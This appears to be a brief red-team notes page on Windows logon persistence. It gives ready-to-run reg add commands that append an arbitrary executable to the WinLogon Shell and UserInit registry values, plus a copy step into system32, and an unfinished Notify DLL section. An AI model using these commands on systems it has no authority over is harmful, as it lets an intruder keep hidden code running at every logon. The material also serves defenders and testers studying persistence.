WinLogon

WinLogon is a component thats handles various "login" activities like Logon, Logoffs, loading user profiles etc. This is managed by registry keys, and we can use these registry keys for persistence.

WinLogon has 2 registry keys values we can use for persistence, shell and UserInit values.

Shell gets executed at login time, and UserInit initializes the users session and is executed by winlogon.

Shell

copy c:\executable.exe c:\windows\system32
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Shell" /T REG_SZ /D "explorer.exe,executable.exe" /F

UserInit

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "UserInit" /T REG_SZ /D "C:\Windows\system32\userinit.exe,c:\windows\system32\executable.exe" /F 

Notify

The notify registry key is found in older OS's and points to a notification package DLL file which handles WinLogon events. We can add DLL entries under this key to cause it to be loaded during logon.

(todo)

Last updated